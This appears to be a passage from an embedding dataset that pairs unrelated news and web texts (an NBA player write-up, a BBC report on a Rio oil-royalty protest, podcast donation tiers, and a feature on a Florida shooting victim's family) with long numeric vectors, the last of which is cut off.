63. In his first season with the Bucks, Monroe continued to be a double-double machine, hauling in a team-high 32 double-doubles while averaging 15.3 points and 8.8 rebounds per game for the season. The write-up on Monroe notes that he’s behind only DeAndre Jordan and Andre Drummond in offensive rebounds since 2011 and points to Monroe’s dependency as he’s appeared in 96 percent of his team’s games during his career. One player not on the list is Jabari Parker, who Sports Illustrated filed under the “biggest snubs” from the Top 100 list. Parker finished the 2015-16 season on a tear, posting averages of 18.9 points, 6.1 rebounds and 2.2 assists per game after the All-Star Break. The 21-year-old certainly has plenty of promise going forward and could very well find himself on the Top 100 list with a solid third NBA season. Despite being a snub this year, Golliver said this about Parker: “Given his spot on the age curve, his physical tools, and his central role on a young Bucks team, Parker looks like an obvious breakout candidate.”
[ -0.01033960934728384, 0.012723565101623535, -0.09464498609304428, -0.09445538371801376, 0.020112687721848488, 0.03045089729130268, 0.09541238844394684, 0.12965060770511627, -0.008278812281787395, 0.06826289743185043, -0.07782452553510666, 0.03749411925673485, -0.010870308615267277, 0.06484866887331009, 0.005849673878401518, -0.00027710909489542246, 0.035052403807640076, 0.07184042781591415, 0.010564805008471012, -0.07899133861064911, -0.0026832676958292723, -0.04965941607952118, 0.046735577285289764, -0.014044740237295628, 0.061985816806554794, -0.04966062679886818, -0.017688237130641937, 0.0411887988448143, -0.10741763561964035, 0.008423968218266964, -0.008697501383721828, -0.0009283219696953893, 0.0922379121184349, -0.02734517678618431, -0.0993695855140686, -0.04430301487445831, -0.055830247700214386, 0.0567638985812664, 0.012660226784646511, -0.033395037055015564, 0.022663641721010208, 0.006165547762066126, -0.012029786594212055, -0.03208164498209953, -0.090673066675663, -0.02429032325744629, -0.05208069831132889, 0.008564854972064495, -0.002852344186976552, 0.0568811297416687, -0.15172462165355682, 0.026110928505659103, 0.013943139463663101, 0.01786036603152752, 0.03462732955813408, 0.1450774371623993, -0.06471534818410873, -0.025509890168905258, -0.024888958781957626, -0.004872557707130909, -0.01976633630692959, 0.036731865257024765, -0.04102698713541031, -0.055284325033426285, -0.027886122465133667, -0.02630898542702198, 0.020728494971990585, -0.021917674690485, -0.018208106979727745, 0.045996543020009995, 0.13437673449516296, 0.03622060269117355, -0.0981738269329071, -0.06698187440633774, 0.058568235486745834, 0.1197931170463562, -0.016885019838809967, 0.09916707873344421, 0.03673635795712471, -0.03323579579591751, 0.08642514050006866, -0.09784611314535141, 0.010980213060975075, -0.018132876604795456, -0.060831326991319656, -0.016016341745853424, -0.04212029650807381, -0.021973807364702225, 0.04552768915891647, 0.06618064641952515, 0.08080969005823135, 0.000023454713300452568, 0.005994918756186962, -0.07407303154468536, 0.0911218523979187, 0.012316407635807991, -0.008714674040675163, -0.03928770869970322, -0.028569700196385384, 0.06232580542564392, 0.025053996592760086, 0.06642363965511322, 0.03424549102783203, -0.06321769952774048, 0.03791582211852074, -0.011592227965593338, 0.10739289969205856, 0.0030119100119918585, 0.005006666760891676, 0.05627739056944847, -0.017029648646712303, 0.025426378473639488, -0.018478401005268097, 0.04509146884083748, -0.025224151089787483, -0.0472184456884861, -0.03941261023283005, 0.12183526158332825, 0.04726431518793106, 0.03160950914025307, 0.05787631496787071, 0.05110574886202812, 0.004806815180927515, 0.0655565857887268, 0.042449384927749634, 0.13881748914718628, -0.030047856271266937, 2.9133969942977905e-33, 0.07238761335611343, 0.030184408649802208, 0.05230991914868355, -0.03164442256093025, -0.05969291180372238, -0.002133848611265421, 0.019245261326432228, -0.025984207168221474, 0.008373388089239597, -0.038288094103336334, -0.07238831371068954, 0.016707317903637886, 0.03462672233581543, 0.06796400249004364, 0.038803987205028534, 0.09530052542686462, 0.010579029098153114, -0.0024584424681961536, -0.04142731428146362, 0.056543126702308655, 0.043446581810712814, 0.010084902867674828, -0.023158514872193336, -0.018140586093068123, -0.04323071986436844, 0.13397625088691711, -0.07326574623584747, -0.018378684297204018, -0.10326053947210312, -0.00429706322029233, -0.03766176477074623, -0.003191717667505145, -0.04952504113316536, 0.053482525050640106, -0.022882165387272835, -0.018945341929793358, -0.035327114164829254, -0.015417723916471004, 0.01962841860949993, -0.027320105582475662, -0.07481987029314041, -0.03134455159306526, -0.03236104175448418, -0.008170881308615208, -0.04404227063059807, -0.007618285715579987, -0.05156682804226875, 0.02143324352800846, -0.010571904480457306, -0.03799636289477348, -0.006326606497168541, -0.018756648525595665, 0.06527079641819, -0.031499750912189484, -0.05050535127520561, -0.025929106399416924, 0.036932796239852905, 0.009430835954844952, 0.07042711973190308, -0.0058880397118628025, 0.02934330329298973, 0.04186810553073883, -0.005163558758795261, 0.0007830348913557827, -0.03851793333888054, 0.00022065920347813517, 0.028666220605373383, -0.011431003920733929, 0.028078578412532806, 0.03872651606798172, 0.106519415974617, -0.07218798995018005, -0.022236399352550507, 0.05425254628062248, 0.025015274062752724, 0.012971729971468449, 0.07065077871084213, -0.05166499689221382, -0.006262471899390221, -0.030287010595202446, 0.03546136990189552, -0.08212834596633911, 0.04942650720477104, -0.06026473268866539, -0.06121861934661865, -0.01807273179292679, 0.014267411082983017, 0.0679285004734993, 0.04196963459253311, 0.022246835753321648, 0.05296749994158745, -0.06947338581085205, -0.0223566722124815, 0.022894589230418205, -0.08821277320384979, -3.823174887878531e-33, -0.1045440137386322, 0.04603845626115799, 0.011952008120715618, 0.00752562889829278, 0.028974469751119614, 0.007190925534814596, -0.0006076301797293127, 0.12707173824310303, 0.018999097868800163, -0.06182150915265083, 0.027317313477396965, -0.04123710095882416, 0.020673301070928574, -0.10010701417922974, 0.04698310047388077, 0.007627822458744049, 0.010968534275889397, -0.03115997463464737, -0.02705189399421215, -0.01772172935307026, 0.04730528965592384, 0.06184935197234154, -0.04171914607286453, 0.08897385001182556, 0.0068060304038226604, -0.0485835000872612, 0.04934578761458397, 0.011559734120965004, -0.09989775717258453, 0.040233127772808075, -0.009206568822264671, 0.0021620127372443676, 0.0949312299489975, -0.02221813052892685, 0.0010309616336598992, 0.007421195972710848, -0.013087421655654907, 0.0013865312794223428, -0.022970985621213913, 0.0893557071685791, -0.003691902384161949, -0.01093329582363367, -0.0067750620655715466, 0.08069758862257004, 0.04890136048197746, 0.022463176399469376, -0.025027189403772354, 0.019186226651072502, 0.007362178061157465, 0.02687784656882286, -0.058805957436561584, 0.05667673423886299, -0.09759937226772308, 0.05589582026004791, -0.026870647445321083, -0.015600173734128475, -0.10499536246061325, 0.04864641651511192, -0.0022495659068226814, -0.016287101432681084, 0.008890710771083832, -0.05103769525885582, 0.00386002566665411, -0.02114340290427208, 0.009996583685278893, 0.058562420308589935, 0.006394390948116779, -0.05332733318209648, -0.1667991727590561, -0.06156161054968834, -0.023154165595769882, -0.044468652456998825, 0.06328277289867401, 0.007756857667118311, -0.05092263221740723, 0.04350541532039642, -0.0654483214020729, 0.09547598659992218, -0.0004847573582082987, -0.0351618155837059, -0.04004412889480591, 0.02561171166598797, -0.10215584933757782, 0.037130244076251984, 0.02786519192159176, -0.017485447227954865, 0.006544077303260565, -0.029754366725683212, -0.03451940417289734, -0.019744886085391045, 0.009305676445364952, -0.06161487102508545, -0.09244520217180252, 0.03794422745704651, 0.0052097151055932045, -5.489648202683384e-8, 0.09105734527111053, 0.04331890493631363, -0.004879808984696865, 0.031199991703033447, 0.007531414274126291, 0.05501817911863327, -0.018074505031108856, 0.05101267993450165, 0.02876238338649273, 0.06269088387489319, 0.01948988065123558, -0.03844666853547096, -0.02066846564412117, 0.01834784634411335, 0.056529730558395386, 0.04011371731758118, -0.02649417519569397, 0.04133906215429306, -0.050023097544908524, 0.027577564120292664, -0.008236340247094631, 0.0416695699095726, 0.005502441432327032, -0.06854396313428879, 0.030004829168319702, -0.06816451996564865, -0.07927563786506653, -0.027144793421030045, -0.041976962238550186, -0.016853954643011093, 0.0010174181079491973, -0.03530258685350418, 0.051102034747600555, -0.027090521529316902, -0.015680158510804176, 0.05916520580649376, -0.007304314989596605, -0.07108225673437119, 0.025220420211553574, -0.11043337732553482, -0.08085604012012482, -0.06656210124492645, -0.01269679144024849, 0.01944960281252861, 0.0015523291658610106, -0.10217095166444778, -0.007924736477434635, -0.033848538994789124, -0.03562084957957268, -0.027609698474407196, -0.04637416452169418, 0.04302636533975601, 0.03352024778723717, -0.025523940101265907, 0.07213807106018066, -0.042350396513938904, -0.018567364662885666, 0.02147839590907097, 0.012748811393976212, -0.02695510722696781, 0.041089434176683426, -0.12660841643810272, -0.011536839418113232, 0.0005094799562357366 ]
Image caption State politicians were among those leading the march in Rio de Janeiro Some 200,000 people have protested in the Brazilian city of Rio de Janeiro against a bill they say will deprive Rio state of much of its oil revenue. They are asking President Dilma Rousseff to veto the bill, which has been approved by Brazil's Congress. The bill proposes sharing oil revenues more evenly between oil-producing states like Rio and other states. Local politicians are fiercely opposed to the move, saying it could cost the state $1.7bn (£1.06bn) next year. They say that the changes would affect Rio's ability to host the 2014 football World Cup and the 2016 Olympics. The bill would lower the level of royalties collected by oil-producing states from 26% to 20%. 'Our heritage' The BBC's Julia Carneiro reports from Rio that state authorities released employees from work and invited musicians and celebrities in order to entice people to attend the demonstration. The protest ended up looking more like a big street party, with people dancing and drinking, she says. Police said about 200,000 people took part. "We cannot redistribute the royalties with other states," Isabel Johnson, a 24-year-old nurse, told the AFP news agency. "It is our heritage and our chance to climb on the international stage," she said. Brazil is expected to be able to produce tens of billions of barrels of crude oil over the coming decades from discoveries of offshore deposits of oil made in recent years. Ms Rousseff has until Friday to approve or reject the bill. State governor Sergio Cabral and Rio's mayor Eduardo Paes were among those on the march. In recent days, state officials have put up banners around the city addressed to Ms Rousseff, bearing the words "Veto, Dilma". Many of the protesters had been bussed in from other parts of the state.
[ 0.02594553306698799, -0.009841641411185265, 0.10711172968149185, 0.008492392487823963, 0.06955268234014511, -0.0050307284109294415, -0.007908430881798267, 0.012899131514132023, 0.011632039211690426, 0.005963993724435568, -0.029093947261571884, -0.07999637722969055, 0.02040800079703331, 0.028605109080672264, -0.015562029555439949, -0.029483508318662643, 0.028780926018953323, -0.08268165588378906, -0.01613497920334339, 0.01575937122106552, 0.0865418016910553, -0.05416586995124817, -0.0817442238330841, 0.11349014937877655, -0.01786687783896923, 0.12266431748867035, 0.03790435194969177, -0.0699412152171135, -0.029039958491921425, 0.029565636068582535, 0.006035846192389727, -0.03732258826494217, 0.03923677280545235, -0.016338571906089783, 0.03939397633075714, -0.009449044242501259, 0.0355970673263073, -0.05354616418480873, -0.009799870662391186, 0.05852600187063217, 0.05811579152941704, -0.08773895353078842, -0.0077262623235583305, -0.02200065180659294, 0.010119239799678326, -0.007170647848397493, 0.15487048029899597, 0.07578715682029724, -0.02921115793287754, 0.014158527366816998, 0.06092238798737526, 0.09286104887723923, -0.01062601339071989, -0.033988047391176224, 0.04397508502006531, -0.09328750520944595, 0.04255075752735138, -0.00451903510838747, -0.017396217212080956, 0.08604595810174942, 0.038536179810762405, -0.004682865459471941, -0.018429333344101906, 0.0003303423582110554, -0.002624976448714733, -0.03947756811976433, -0.058663077652454376, 0.010853213258087635, -0.056425485759973526, -0.02322344109416008, 0.045536138117313385, -0.004063211381435394, 0.10829219222068787, -0.023162320256233215, 0.03635699674487114, -0.0027649973053485155, 0.06516623497009277, 0.049562785774469376, 0.03526439890265465, -0.0902005136013031, 0.0015617371536791325, -0.11867918819189072, -0.030529772862792015, -0.08027591556310654, 0.019782133400440216, -0.049637965857982635, 0.05757894366979599, -0.032505519688129425, 0.04920816048979759, 0.008588816970586777, -0.05519942566752434, 0.022736351937055588, 0.08366118371486664, -0.003810197813436389, 0.049480538815259933, 0.047157108783721924, -0.011136075481772423, 0.0036250411067157984, 0.019415875896811485, 0.06286198645830154, -0.02897016517817974, 0.0578901544213295, 0.025632798671722412, -0.03816989064216614, 0.0044131409376859665, -0.006264793686568737, -0.08794158697128296, 0.02666284143924713, -0.01588352583348751, 0.07660367339849472, -0.01985403336584568, -0.013081137090921402, -0.012496097944676876, 0.0877515971660614, -0.0790129005908966, 0.04684004932641983, -0.05405273288488388, -0.08923619240522385, -0.01483068149536848, -0.005512142553925514, 0.01499363873153925, -0.061950936913490295, -0.03863944485783577, 0.034120745956897736, 0.05720803141593933, -0.04598357528448105, -0.035059742629528046, 1.7222138346538564e-33, -0.015245918184518814, -0.07670088857412338, 0.025583410635590553, -0.06976742297410965, -0.08089834451675415, 0.07108870893716812, -0.01378968171775341, 0.019643248990178108, -0.010760584846138954, -0.03196382150053978, 0.02856024168431759, 0.058755598962306976, 0.012502288445830345, 0.12374080717563629, 0.03589148819446564, -0.06437741219997406, -0.03878554701805115, -0.03353392332792282, -0.038014527410268784, 0.05735732987523079, 0.05451621860265732, 0.043163713067770004, -0.02854757569730282, 0.05477827787399292, -0.07896924763917923, 0.07266990840435028, -0.0665685385465622, -0.07896674424409866, 0.04710002243518829, 0.04624752327799797, -0.03268492594361305, -0.04601775109767914, 0.03661416471004486, 0.029040388762950897, -0.07353973388671875, -0.02152189239859581, 0.028361305594444275, -0.06809504330158234, -0.05765393748879433, 0.01450912095606327, -0.029854370281100273, -0.014057151973247528, -0.00470782071352005, -0.019610121846199036, -0.03404594585299492, 0.08399349451065063, 0.08468390256166458, -0.09258923679590225, -0.005808733869343996, -0.007108188234269619, 0.033170435577631, -0.011494708247482777, -0.035773955285549164, -0.08265689760446548, 0.06442910432815552, -0.09669745713472366, -0.0768842026591301, -0.014729945920407772, 0.08406563848257065, -0.08309587836265564, -0.05606628209352493, 0.0897778868675232, 0.008060457184910774, 0.0782432109117508, -0.03210579976439476, 0.04264470189809799, 0.061304084956645966, 0.048683639615774155, 0.030961157754063606, -0.05119742080569267, -0.022652894258499146, 0.12653328478336334, -0.01342654787003994, 0.003380806418135762, -0.05002276226878166, -0.011058969423174858, 0.08488796651363373, 0.018989266827702522, -0.005019543692469597, 0.07829360663890839, -0.03724411129951477, -0.02990148961544037, 0.05979226902127266, -0.053652867674827576, 0.0604286715388298, 0.0667107105255127, 0.00392340961843729, 0.06717225164175034, -0.02889595925807953, 0.004977601580321789, -0.08342715352773666, 0.006608522031456232, -0.03464178368449211, 0.06102695316076279, -0.007725878152996302, -4.319993901833724e-33, -0.0028791141230612993, -0.07241027802228928, 0.08054688572883606, 0.030850961804389954, -0.012579907663166523, -0.007671224884688854, -0.017670899629592896, 0.068889319896698, 0.03622439131140709, -0.04461274668574333, -0.08131219446659088, -0.060217685997486115, 0.049051683396101, 0.0179119985550642, -0.0517442412674427, -0.10494296997785568, 0.045278675854206085, -0.0014275769935920835, -0.06930774450302124, -0.01594177447259426, -0.026261188089847565, 0.10362322628498077, 0.007241235114634037, 0.06421734392642975, -0.117380790412426, -0.016886606812477112, 0.036122191697359085, -0.07331936806440353, -0.04726972430944443, -0.004000701010227203, -0.018399927765130997, 0.04151781275868416, -0.11497161537408829, -0.029538774862885475, -0.039781201630830765, 0.021662434563040733, -0.03223573416471481, -0.017372021451592445, -0.07904468476772308, -0.011834223754703999, 0.05961410328745842, -0.051600582897663116, -0.010560070164501667, 0.025981329381465912, -0.06131472811102867, 0.02937462367117405, -0.03264336660504341, -0.03884498029947281, 0.04468332976102829, -0.03330757096409798, 0.010601792484521866, -0.023836540058255196, -0.09361793845891953, 0.04925939813256264, -0.037999264895915985, -0.01004937943071127, 0.004969428759068251, 0.05023252218961716, 0.03209610655903816, -0.02993357926607132, -0.04586191847920418, 0.009342784062027931, 0.011550312861800194, -0.10516814887523651, -0.0320008248090744, 0.009388448670506477, -0.038600943982601166, 0.018919095396995544, 0.13235938549041748, 0.08225743472576141, 0.05012298747897148, -0.03126989305019379, -0.0905696302652359, 0.05338682606816292, 0.05058145150542259, 0.06589418649673462, -0.026291077956557274, 0.02156153693795204, 0.0447704903781414, 0.04773835837841034, 0.035363346338272095, -0.033452108502388, -0.012835661880671978, -0.06585437059402466, 0.138969287276268, 0.016433153301477432, -0.03626137971878052, -0.07283248752355576, -0.006927689537405968, 0.10148193687200546, -0.03935771435499191, 0.003781323553994298, -0.021331429481506348, -0.032662104815244675, -0.02218710444867611, -5.8733633068186464e-8, -0.04499318078160286, 0.02521671913564205, 0.03506336733698845, 0.05163321644067764, -0.012863006442785263, 0.018839869648218155, -0.01633831299841404, 0.009503611363470554, 0.01597498543560505, -0.02015746384859085, 0.12381348013877869, -0.05882284417748451, -0.0324828065931797, -0.04925490543246269, -0.07500982284545898, 0.023949896916747093, -0.04560886695981026, 0.04327099397778511, -0.007830502465367317, -0.004070900846272707, -0.028593672439455986, -0.02369154803454876, -0.06564251333475113, -0.005130965728312731, 0.03360040485858917, -0.05626111105084419, -0.0071737682446837425, 0.04738792032003403, -0.0000018057332908938406, -0.08580335974693298, -0.01891595497727394, -0.07114037126302719, -0.03251583129167557, 0.014529356732964516, 0.052524633705616, -0.0894763320684433, -0.017476705834269524, -0.03397621586918831, -0.021358279511332512, -0.03969525918364525, 0.0027995461132377386, -0.03367611765861511, -0.003194850869476795, 0.00011398376955185086, 0.013514542020857334, 0.02057752013206482, -0.07000616192817688, -0.00976591743528843, 0.0019633211195468903, -0.06462596356868744, -0.05304102227091789, -0.030753910541534424, -0.014400633051991463, 0.09835489839315414, 0.049815353006124496, -0.04966168478131294, 0.02016482874751091, -0.0070876022800803185, -0.015617111697793007, 0.006225472781807184, 0.00442692032083869, -0.0405271090567112, -0.04168220981955528, 0.06352847814559937 ]
Have a question about our membership tiers, Patreon, or your rewards? Check out our FAQ, Patreon's FAQs, and if you don’t find an answer to your question, e-mail us at [email protected] with the subject “Membership Question.” ONE-TIME DONATION We still have options for anyone wanting to make a one time donation! $1 - $74 = Big thanks, fearful listener! $75 - $149 = We'll send you a set of 4 Night Vale postcards (4 unique designs) $150 - $249 = We'll send you a black Welcome to Night Vale logo shirt, plus a set of Night Vale postcards $250+ = Super thanks! You get immunity from all laws for 1 month. Plus the shirt and the postcards, and we'll even have Cecil record you a very special message.
[ -0.09008228778839111, 0.0320872999727726, 0.004907044116407633, 0.021271198987960815, 0.008455582894384861, 0.03944852948188782, 0.06290343403816223, -0.008915736339986324, -0.03384863957762718, -0.12000545114278793, -0.034335847944021225, -0.06686253100633621, 0.024390587583184242, -0.05335596203804016, 0.05068320035934448, 0.04769253730773926, 0.02630777843296528, -0.05935532972216606, -0.004352684132754803, 0.019975218921899796, -0.10401614010334015, -0.06438266485929489, -0.00918838381767273, 0.07961121946573257, -0.026200858876109123, -0.035335294902324677, -0.05374154821038246, -0.00016433658311143517, 0.003522784449160099, -0.06375505775213242, 0.025984423235058784, 0.07364992052316666, 0.07286543399095535, 0.03201507031917572, 0.01593587175011635, 0.058659691363573074, 0.0791764184832573, -0.038704950362443924, -0.06531279534101486, 0.03634737432003021, -0.0446447916328907, -0.06742855906486511, -0.014091188088059425, -0.0006694914773106575, -0.06365618109703064, -0.013298233970999718, 0.03737879544496536, 0.08340445160865784, -0.028756527230143547, 0.016748981550335884, 0.1360643059015274, -0.05806485190987587, -0.004286265932023525, 0.00683092325925827, -0.013944821432232857, 0.035279251635074615, 0.026838630437850952, -0.03150581195950508, -0.07156827300786972, -0.055730003863573074, -0.0008496089722029865, 0.008784285746514797, -0.06616226583719254, 0.04208388179540634, -0.010168156586587429, 0.0032758291345089674, -0.07510783523321152, 0.054618950933218, 0.002182398922741413, -0.09121408313512802, -0.025942130014300346, 0.05891115963459015, 0.08124537020921707, 0.03504575788974762, 0.04008382186293602, 0.0653725266456604, 0.019133443012833595, -0.046308837831020355, 0.055408090353012085, 0.040770743042230606, -0.08387284725904465, 0.048570722341537476, 0.005847778636962175, 0.020020492374897003, 0.0018433606019243598, 0.00714441854506731, -0.008960598148405552, 0.04023824632167816, -0.005375924054533243, -0.01330117043107748, -0.013042517006397247, 0.07055864483118057, 0.05592415854334831, -0.04747573658823967, -0.0990358218550682, 0.03305179253220558, -0.044077277183532715, -0.017029976472258568, -0.04747606813907623, 0.04952841252088547, 0.0321885347366333, 0.09729856252670288, 0.0073243845254182816, -0.0281778946518898, 0.045801687985658646, -0.02635473757982254, -0.03460510075092316, 0.05885620415210724, 0.08160528540611267, -0.012795466929674149, -0.011936547234654427, 0.019777625799179077, 0.06310633569955826, -0.03440118953585625, -0.03175490349531174, 0.022837022319436073, -0.0033658703323453665, 0.05609205737709999, 0.10398761183023453, -0.026852210983633995, 0.0500381775200367, 0.06281806528568268, 0.04356251657009125, -0.052340298891067505, -0.01798626407980919, -0.08787383884191513, -0.006888213567435741, 4.4912215517622836e-33, 0.02339441329240799, 0.18183515965938568, 0.05442766845226288, 0.017238683998584747, 0.0809343233704567, -0.05537988990545273, 0.008891427889466286, 0.041109178215265274, -0.029353272169828415, 0.011075745336711407, 0.027815112844109535, 0.06394337117671967, 0.10421403497457504, 0.09210535138845444, -0.02643311582505703, -0.02946772426366806, -0.05060076341032982, -0.05073162913322449, 0.020711202174425125, -0.10464673489332199, -0.0017775166779756546, -0.025161059573292732, 0.0216571893543005, 0.07926402986049652, 0.0056096026673913, -0.06268467754125595, -0.016932398080825806, 0.07267626374959946, 0.029289619997143745, -0.019439538940787315, -0.011618233285844326, 0.015163175761699677, 0.07343186438083649, -0.03462483733892441, -0.0027135098353028297, 0.05341321974992752, 0.026911474764347076, -0.05891953036189079, 0.020414207130670547, -0.0411205068230629, -0.05478517711162567, 0.03250189870595932, 0.02118564397096634, 0.024847770109772682, -0.01765512116253376, -0.017538221552968025, 0.07914514094591141, -0.02581077441573143, 0.004514563363045454, 0.04583512619137764, -0.03373367339372635, -0.05249002203345299, -0.09306853264570236, -0.01109770592302084, -0.09935973584651947, -0.14205783605575562, -0.02350512333214283, 0.01452891156077385, -0.014105156064033508, -0.07395053654909134, 0.08060667663812637, -0.04944756254553795, 0.08563674241304398, -0.002221456728875637, -0.14054091274738312, -0.011647852137684822, -0.06147073209285736, -0.07371904700994492, -0.005051472689956427, 0.00583984237164259, 0.054632700979709625, 0.06887925416231155, -0.003267723834142089, -0.10670781880617142, 0.035698167979717255, 0.029792150482535362, 0.05974746122956276, -0.0008984311716631055, 0.1232873946428299, 0.02759617008268833, -0.06260659545660019, -0.0057630110532045364, -0.002427175175398588, 0.010021621361374855, 0.058546751737594604, -0.0050748176872730255, 0.1421544998884201, -0.040516212582588196, -0.04684870317578316, -0.0039148274809122086, -0.017014773562550545, -0.03555074334144592, 0.06960956752300262, -0.09803906828165054, 0.024869635701179504, -4.226497652563212e-33, 0.03479202091693878, -0.027053510770201683, 0.051014043390750885, -0.037392083555459976, 0.04496028646826744, -0.03706290200352669, -0.05404159799218178, 0.06698138266801834, 0.041233599185943604, 0.061723459511995316, -0.003124725539237261, 0.06712564080953598, -0.020615611225366592, 0.010747860185801983, -0.11314377933740616, -0.07569421082735062, 0.02724069356918335, 0.06575583666563034, -0.016230231150984764, -0.04617124795913696, -0.020117340609431267, 0.12128198146820068, -0.05139758810400963, 0.005152941681444645, -0.009748943150043488, 0.048992983996868134, 0.004919477738440037, -0.03649495542049408, 0.028177445754408836, -0.0031699887476861477, 0.017402682453393936, -0.04222390800714493, -0.021780893206596375, 0.03260745480656624, 0.021788468584418297, 0.01679590716958046, 0.052247170358896255, 0.04331931099295616, 0.012200294062495232, -0.0062598311342298985, 0.014044621959328651, -0.0851452425122261, -0.019015571102499962, 0.007534002885222435, -0.0358891598880291, -0.10129451006650925, -0.04479190334677696, -0.0456419475376606, 0.02150103449821472, 0.05187198519706726, -0.07618635892868042, -0.0679701566696167, 0.03833881393074989, 0.05649749934673309, -0.041969023644924164, 0.07316449284553528, -0.0206476841121912, 0.03378744050860405, 0.004279325716197491, -0.028664227575063705, -0.05870730057358742, 0.059279102832078934, -0.038928963243961334, 0.00940394401550293, 0.05612895265221596, -0.08696559071540833, 0.0020421321969479322, 0.035830751061439514, -0.02480308525264263, 0.013308331370353699, -0.06599216163158417, 0.00047675275709480047, 0.022693606093525887, -0.05220580846071243, -0.07126021385192871, -0.008981840685009956, 0.09125567972660065, -0.007713384926319122, -0.07142066210508347, -0.022024642676115036, -0.06896202266216278, -0.08751192688941956, -0.0016631752951070666, 0.08102507144212723, 0.026076212525367737, -0.047833651304244995, 0.07479199767112732, -0.002958899363875389, 0.03964528441429138, 0.045871444046497345, 0.009354589506983757, 0.04783746972680092, 0.09910943359136581, 0.04188749939203262, 0.06050099804997444, -5.480884013309151e-8, 0.02260226383805275, 0.036854349076747894, -0.057534124702215195, 0.04374675825238228, 0.024710722267627716, 0.0014456640928983688, -0.02145807072520256, -0.0884777307510376, -0.09359433501958847, 0.021268241107463837, 0.03745439276099205, 0.029125764966011047, -0.037828363478183746, -0.13135065138339996, -0.006944683846086264, -0.05627056211233139, -0.05923672392964363, -0.03742649778723717, -0.05235451087355614, -0.06117844954133034, -0.019515177235007286, 0.02011791430413723, 0.003083745716139674, -0.019283168017864227, -0.060907457023859024, 0.04179884493350983, 0.04923111945390701, 0.06199081614613533, -0.0033762336242944, -0.04114444553852081, 0.0029996258672326803, 0.028627926483750343, -0.03501628339290619, -0.024860313162207603, 0.048601217567920685, -0.03732391446828842, -0.05560645833611488, -0.025958558544516563, 0.015665896236896515, 0.0626240000128746, 0.007753897458314896, -0.011107762344181538, -0.058487068861722946, 0.022781074047088623, 0.005256409756839275, 0.032064519822597504, -0.06384840607643127, 0.016936760395765305, 0.02217818982899189, -0.008595517836511135, 0.012449030764400959, -0.012518557719886303, 0.009608295746147633, 0.034750159829854965, 0.005775553174316883, 0.011334497481584549, 0.03489147126674652, 0.049246642738580704, 0.08887806534767151, 0.012583088129758835, 0.04751156270503998, -0.07610253244638443, -0.02298794686794281, -0.05102693289518356 ]
At 26, Ali Bryant is still scared of the dark. Her brother, Austin Bryant, knew that. The night before he was killed, he was in her room being the little brother older sisters tend to have: annoying. He’d grab at her feet as she slept to frighten her or put his feet in her face just to mess with her. Ali smiled at the thought. Today, her brother’s ashes rest in a red, metallic urn on the dresser across from the foot of her bed as she sleeps. "Sometimes I feel a breeze of wind blow past me or someone messing with my foot and I know it’s my brother. And I’ll be like, ‘OK, Austin. I get it,’" she said, laughing. "It’s just things like that that let me know (he’s there)." Sunday marked the one-year since 20-year-old Austin Bryant was shot and killed by the intersection of Military Trail and Purdy Lane near Flashdance, according to the Palm Beach County Sheriff’s Office. Investigators say a fight broke out during the early hours of April 16, someone pulled a gun and shot Austin outside the strip club. He was found dead at the scene. No arrest has been made. Crime Stoppers of Palm Beach County is offering a $1,000 reward for information in the case. Those with information are asked to call 800-458-TIPS (8477). For Ali, a year later means less pain, more anger. Why did they shoot her brother? Why do they get to go home to their family and sleep at night? When does Austin get justice? "No one deserves to die like that. No one," she said. "Someone knows who did this. They need to come forward." For Austin’s mother, Kristina Bryant, there’s still a lot of pain. She misses her son’s calls during they day and still waits for his 6-foot frame to fill the doorway of his grandmother’s home just north of Lake Park where she and her daughter live. She can smile at those thoughts now. But in those first few months after her son was killed, she didn’t stop crying. She lost her job as a nurse and couldn’t go outside most days. "The loss of a child doesn’t come with a handbook. You just try to do what you think is right," she said. "I brought two kids into this world, and now when I wake up, there’s one. It just doesn’t seem natural. It doesn’t seem right." In the past few months, she started going through boxes of his things and found a shirt that smelled just like Austin. She couldn’t believe it. There he was with her again. "Well, he had a smell," her daughter chimes in and they both laugh. In the past year, Kristina said she’s thankful for her son’s friends who always check in, her daughter to lean on and for the Palm Beach County Sheriff’s Office detective working the case. She said the detective keeps in contact with her constantly, even if new evidence or news comes few and far between. But she still has hope. "I’ll never forget. She sat in that chair," she said pointing to the leather recliner her daughter sat in by the door, "And said, ‘I promise, no matter what I will not quit working on this case until it’s solved.’ We just keep hoping and praying that some kind of miracle will happen."
[ -0.02958032675087452, 0.07253844290971756, -0.06305212527513504, 0.02334008924663067, 0.012652681209146976, 0.02965301088988781, 0.08812060207128525, -0.030326908454298973, 0.028927000239491463, -0.026003334671258926, 0.09157989919185638, 0.004081734921783209, 0.15522237122058868, -0.08528206497430801, 0.02636927179992199, 0.030500441789627075, 0.039202481508255005, 0.08022313565015793, -0.09179788827896118, 0.028209256008267403, -0.05646621435880661, 0.029806528240442276, 0.04512318968772888, -0.002721260767430067, -0.07047270238399506, 0.05310898274183273, 0.059276122599840164, -0.011879718862473965, -0.061641138046979904, -0.08866945654153824, 0.02037702687084675, -0.05981038883328438, -0.010110216215252876, 0.0008573476225137711, 0.06858661770820618, -0.013018372468650341, 0.01953705959022045, 0.021179789677262306, 0.015146777965128422, 0.019002487882971764, -0.008658544160425663, 0.000027527807105798274, 0.0922408327460289, 0.02533312886953354, -0.04042370244860649, -0.0453515499830246, 0.015024865977466106, -0.0304995309561491, 0.046491868793964386, -0.01656513847410679, -0.016417058184742928, 0.01157365646213293, 0.04417290538549423, 0.011146299540996552, 0.07974302023649216, -0.0008429953595623374, -0.012802021577954292, 0.019156605005264282, -0.018613940104842186, -0.013165445066988468, 0.007963025011122227, -0.004074658267199993, 0.02281723916530609, -0.028531160205602646, -0.08492007851600647, 0.004565412178635597, -0.008836611174046993, -0.07486197352409363, 0.12046343833208084, 0.04226163029670715, 0.07270585745573044, -0.016614364460110664, 0.01574525609612465, -0.01935925893485546, -0.04695811867713928, 0.05598253011703491, 0.07008417695760727, -0.04249231144785881, 0.0007514419849030674, 0.000711251690518111, -0.01830703392624855, -0.09996283799409866, -0.04975754767656326, -0.03827223926782608, -0.020385457202792168, -0.0954374223947525, 0.004006471950560808, -0.02201841026544571, -0.04899909347295761, 0.016749335452914238, -0.01643899828195572, 0.06238698959350586, -0.027436833828687668, -0.020031942054629326, 0.12465201318264008, -0.047296490520238876, -0.005978366360068321, 0.021980885416269302, -0.09864447265863419, 0.05472268536686897, 0.06811387091875076, 0.013727936893701553, 0.032136525958776474, 0.03680408373475075, 0.038194794207811356, -0.000032028074201662093, -0.04876448214054108, 0.05306972190737724, -0.0067048086784780025, -0.044559724628925323, 0.022937269881367683, -0.028965594246983528, 